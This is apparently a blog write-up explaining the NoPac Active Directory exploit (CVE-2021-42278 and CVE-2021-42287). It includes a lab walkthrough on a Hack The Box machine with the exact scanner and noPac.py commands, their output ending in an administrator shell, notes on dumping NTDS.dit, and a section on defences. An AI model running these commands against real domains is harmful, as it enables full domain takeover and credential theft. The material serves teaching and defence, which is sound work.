Introduction:
In late 2021 the “NoPac” exploit leveraged two critical vulnerabilities in Microsoft’s Active Directory, potentially allowing an attacker to escalate from a standard user account to domain administrator privileges with alarming ease.
Key Points:
- NoPac exploits two vulnerabilities: CVE-2021-42278 and CVE-2021-42287
- It allows privilege escalation from a standard user to domain admin
- Understanding this exploit is crucial for system administrators and security professionals
Let’s delve into the intricacies of NoPac, exploring the underlying vulnerabilities, mechanics, and the significant threat it posed to organizational security.
Understanding the Vulnerabilities:
At its core, the NoPac exploit takes advantage of two distinct but interrelated vulnerabilities in Microsoft’s Active Directory. Let’s examine each in detail:
CVE-2021-42278: SAM Bypass Vulnerability:
The first vulnerability, CVE-2021-42278 , is a bypass vulnerability in the Security Account Manager (SAM).
Key Characteristics:
- Allows an attacker to manipulate the
SamAccountNameof a computer account. - Enables changing a computer account name to match that of a Domain Controller.
- Exploits a flaw in how Active Directory handles computer account naming>
Impact:
- Creates confusion in the domain’s naming structure.
- Sets the stage for the second part of the exploit.
CVE-2021-42287: Kerberos PAC Vulnerability:
The second vulnerability, CVE-2021-42287 , resides within the Kerberos Privilege Attribute Certificate (PAC) in Active Directory Domain Services (AD DS).
Key Characteristics:
- Allows manipulation of Kerberos ticket issuance
- Exploits how the Key Distribution Center (KDC) handles service ticket requests
Impact:
- Enables an attacker to obtain a service ticket for a Domain Controller
- When combined with CVE-2021-42278 , leads to privilege escalation
The NoPac Exploit Process:
To better understand the flow of the NoPac exploit, let’s look at a simplified diagram of the process:
+--------------------------------------------------+
| |
| +--------------------------------------------+ |
| | | |
| | 1. Initial Access | |
| | - Standard domain user credentials | |
| | | |
| +--------------------------------------------+ |
| | |
| v |
| +--------------------------------------------+ |
| | | |
| | 2. Exploit CVE-2021-42278 | |
| | - Change computer account name | |
| | - Match Domain Controller name | |
| | | |
| +--------------------------------------------+ |
| | |
| v |
| +--------------------------------------------+ |
| | | |
| | 3. Request TGT | |
| | - For the renamed computer account | |
| | | |
| +--------------------------------------------+ |
| | |
| v |
| +--------------------------------------------+ |
| | | |
| | 4. Exploit CVE-2021-42287 | |
| | - Request service ticket | |
| | - KDC issues ticket for DC | |
| | | |
| +--------------------------------------------+ |
| | |
| v |
| +--------------------------------------------+ |
| | | |
| | 5. Privilege Escalation | |
| | - Obtain Domain Admin privileges | |
| | | |
| +--------------------------------------------+ |
| |
+--------------------------------------------------+
This diagram outlines the five main steps an attacker would typically follow when exploiting NoPac. Let’s dive deeper into each step.
Step 1: Initial Access
The attack begins with standard domain user credentials. It’s crucial to note that by default, authenticated users can add up to 10 computers to a domain, which is a key factor in this exploit.
Step 2: Exploiting CVE-2021-42278:
The attacker leverages CVE-2021-42278 to change the name of a new computer account to match a Domain Controller’s SamAccountName. This step exploits the vulnerability in how Active Directory handles computer account naming.
Step 3: Requesting a TGT:
With the renamed computer account, the attacker requests a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC).
Step 4: Exploiting CVE-2021-42287:
The attacker then exploits CVE-2021-42287 by requesting a service ticket. Due to the vulnerability in the Kerberos PAC, the KDC issues a ticket for the Domain Controller.
Step 5: Privilege Escalation:
With the obtained service ticket for the Domain Controller, the attacker can now escalate their privileges to Domain Admin level, effectively compromising the entire domain.
Real-World Exploitation Example:
To better understand how the NoPac exploit works in practice, let’s walk through a real-world example. This demonstration will show each step of the process, from initial access to achieving domain admin privileges.
- This attack was performed on the Hack The Box machine Resolute:
- https://app.hackthebox.com/machines/Resolute
- My walkthrough is available here:
Prerequisites:
Before we begin, ensure you have the following:
- A vulnerable Windows domain environment (pre-patch for CVE-2021-42278 and CVE-2021-42287)
- Standard domain user credentials
- Access to a machine joined to the domain
- The NoPac exploit & python installed:
Step-by-Step Exploitation:
1 - Prepare the Exploit:
-
Create Python Virtual Environment:
- I prefer to use python venvs when using exploits this way I don’t mess with my underlying python install and everything can existing in it’s own space with it’s own dependencies
cd noPacpython3 -m venv noPac
-
Activate Venv:
source noPac/bin/activate
-
Install Dependencies:
pip3 install -r requirements
2. Enumerate to find out if the target is vulnerable to the NoPac Exploit:
- Luckly the exploit we are using comes with a scanner, so this can be used to check if the host is vulnerable.
kali in noPac π£ main π€οΈ Γ1π v3.12.6 2GiB/15GiB | 0B/1GiB with /usr/bin/zsh π 14:00:18 zsh β sudo python3 scanner.py $domain/$user:$pass -dc-ip $box -use-ldap βββ ββ ββββββ ββββββ βββββ ββββββ ββββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββββββ βββββββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββββ ββββββ ββ ββ ββ ββββββ [*] Current ms-DS-MachineAccountQuota = 10 [*] Got TGT with PAC from 10.129.96.155. Ticket size 1470 [*] Got TGT from 10.129.96.155. Ticket size 721
3. Execute the Exploit:
-
Run the NoPac exploit tool with your standard domain user credentials.
-
The tool will automatically perform the necessary steps to exploit both vulnerabilities.
-
Here’s an example of what the output might look like when running the NoPac exploit:
kali in noPac π£ main π€οΈ Γ1π v3.12.6 2GiB/15GiB | 0B/1GiB with /usr/bin/zsh π 14:38:42 zsh β― sudo python3 noPac.py $domain/$user:$pass -dc-ip $box -dc-host resolute -shell --impersonate administrator -use-ldap βββ ββ ββββββ ββββββ βββββ ββββββ ββββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββββββ βββββββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββ ββββ ββββββ ββ ββ ββ ββββββ [*] Current ms-DS-MachineAccountQuota = 10 [*] Selected Target RESOLUTE.megabank.local [*] will try to impersonate administrator [*] Adding Computer Account "WIN-LE7ODKFREMZ$" [*] MachineAccount "WIN-LE7ODKFREMZ$" password = 7N9FdTniA0C9 [*] Successfully added machine account WIN-LE7ODKFREMZ$ with password 7N9FdTniA0C9. [*] WIN-LE7ODKFREMZ$ object = CN=WIN-LE7ODKFREMZ,CN=Computers,DC=megabank,DC=local [*] WIN-LE7ODKFREMZ$ sAMAccountName == RESOLUTE [*] Saving a DC's ticket in RESOLUTE.ccache [*] Reseting the machine account to WIN-LE7ODKFREMZ$ [*] Restored WIN-LE7ODKFREMZ$ sAMAccountName to original value [*] Using TGT from cache [*] Impersonating administrator [*] Requesting S4U2self [*] Saving a user's ticket in administrator.ccache [*] Rename ccache to administrator_RESOLUTE.megabank.local.ccache [*] Attempting to del a computer with the name: WIN-LE7ODKFREMZ$ [-] Delete computer WIN-LE7ODKFREMZ$ Failed! Maybe the current user does not have permission. [*] Pls make sure your choice hostname and the -dc-ip are same machine !! [*] Exploiting.. [!] Launching semi-interactive shell - Careful what you execute
4. Verify Privilege Escalation:
- Once the exploit completes, verify your new privileges using commands like
whoami /groupsor by attempting to access Domain Controller resources.
C:\Windows\system32>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
5. Post-Exploitation:
- With Domain Admin privileges, you now have full control over the domain and can perform actions like dumping the
NTDS.ditfile or creating new domain admin accounts. - To see my approach to this see my walkthrough:
Defending Against NoPac Attacks:
Given the severity of the NoPac exploit, it’s crucial for system administrators to take steps to mitigate the risks. Here are some key defensive measures:
-
Apply Security Updates:
- Immediately apply the patches released by Microsoft for CVE-2021-42278 and CVE-2021-42287.
- Regularly check for and apply new security updates.
-
Implement Least Privilege:
- Restrict user permissions to the minimum necessary for their roles.
- Regularly audit and review user and computer account permissions.
-
Monitor Active Directory:
- Implement robust logging and monitoring for Active Directory events.
- Pay special attention to computer account name changes and unusual service ticket requests.
-
Use Advanced Threat Detection:
- Employ security information and event management (SIEM) tools to detect suspicious activities.
- Consider using Active Directory-specific security tools that can detect exploitation attempts.
-
Conduct Regular Security Assessments:
- Perform frequent vulnerability scans and penetration tests.
- Use tools like PingCastle to assess the overall security posture of your Active Directory environment.
-
Implement Network Segmentation:
- Separate critical assets and limit lateral movement within the network.
- Use firewalls and access controls to restrict unnecessary communication between network segments.
-
Educate and Train:
- Ensure IT staff are aware of the latest threats and mitigation strategies.
- Conduct regular security awareness training for all users.
Remember, no single measure can provide complete protection against sophisticated attacks like NoPac. A defense-in-depth strategy, combining multiple layers of security controls, is crucial for comprehensive protection.
Conclusion:
By leveraging two seemingly minor vulnerabilities, attackers can potentially compromise an entire domain with alarming ease. This underscores the critical importance of prompt patching, continuous monitoring, and a proactive approach to security.
Further Reading:
For those interested in diving deeper into this topic, I recommend exploring:
- Microsoft’s Security Update Guide for CVE-2021-42278
- Microsoft’s Security Update Guide for CVE-2021-42287
- https://www.secureworks.com/blog/nopac-a-tale-of-two-vulnerabilities-that-could-end-in-ransomware
- MITRE ATT&CK framework , particularly the entries on Initial Access and Privilege Escalation techniques
Frequently Asked Questions:
Q: How quickly should organizations patch for NoPac vulnerabilities?
A: Organizations should treat these vulnerabilities as critical and apply patches as soon as possible, ideally within days of their release.
Q: Can NoPac be exploited remotely?
A: While initial access to the domain is required, once an attacker has standard domain user credentials, they can potentially exploit NoPac remotely.
Q: Are there any signs that might indicate a NoPac attack has occurred?
A: Signs may include unexpected computer account name changes, unusual service ticket requests. However, skilled attackers will attempt to cover their tracks.
Q: Can NoPac be mitigated without applying patches?
A: While patching is the most effective mitigation, other measures like restricting user permissions and monitoring Active Directory events can help reduce the risk. However, these should be considered temporary measures until patching can be completed.
Q: How does NoPac compare to other Active Directory exploits?
A: NoPac is particularly dangerous due to its relative simplicity and the potential for rapid privilege escalation. Unlike some exploits that require specific misconfigurations, NoPac could potentially affect any unpatched Active Directory environment.